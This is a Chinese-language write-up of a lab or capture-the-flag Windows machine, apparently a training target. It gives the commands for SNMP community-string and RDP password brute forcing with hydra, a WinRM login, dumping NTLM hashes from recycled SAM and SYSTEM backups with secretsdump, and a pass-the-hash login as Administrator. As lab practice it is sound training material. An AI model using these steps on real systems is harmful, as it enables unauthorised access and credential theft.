Before all
有趣owob
Victim’s IP : 10.10.248.168
Attacker’s IP : 10.9.195.189
Write Up
註解:中間有部分ip會與報告前言不同,這是因為有重啟機器的緣故
RECON
port scan
以速度為考量,先使用了rustscan掃描TCP ports
1 | rustscan -a 10.10.248.168 --ulimit 5000 -- -sC -sV -PN |
有web, samba, 無法連線的mysql, rdp以及winrm
然而,在後續的滲透中無法從前面幾種服務找到利用點,轉而利用nmap進行udp端口掃描
1 | sudo nmap -sU --top 20 10.10.248.168 |
有snmp service
Exploit
snmp abuse leak username
針對snmp進行利用,首先採用工具snmpwalk嘗試進行連線
1 | snmpwalk -c public 10.10.50.197 |
經過觀察,這是comunity string錯誤的緣故,利用 onsixtyone字典檔(link)搭配hydra進行comunity string爆破
1 | hydra -P snmp-string.txt snmp://10.10.248.168 |
重新以snmpwalk工具連線後並未得到能在此階段利用的資訊,轉而利用 snmp-check 的工具進行資訊蒐集
1 | snmp-check 10.10.248.168 -c openview -d |
獲得使用者名稱Jareth
rdp brute forcing
1 | hydra -l Jareth -P ~/rockyou.txt rdp://10.10.248.168 -t 64 |
使用者無法透過rdp連線,但依然取得了密碼
Jareth/sarah
利用 evil-winrm成功建立連線:
1 | evil-winrm -u Jareth -p sarah -i 10.10.248.168 |
Privilege Escalation
Recycle bin forensics
1 | ls -Fo 'C:\$Recycle.Bin' |
查看recycle bin裡的資料夾,後綴號碼為user id
於使用者資料夾中取得疑似sam和system檔案的備份檔
利用 evil-winrm download指令進行檔案下載,於本地利用 Impackcet中的 secretsdump取得NTLM HASH
1 | python3 /opt/impacket/examples/secretsdump.py -sam sam.bak -system system.bak local |
最後針對Administrator帳號施行 Pass The Hash 攻擊
1 | evil-winrm -u Administrator -H 6bc99ede9edcfecf9662fb0c0ddcfa7a -i 10.10.248.168 |
成功取得連線
After all
第一次翻recycle bin =w=
然後終於有正常的 snmp-check用ㄌ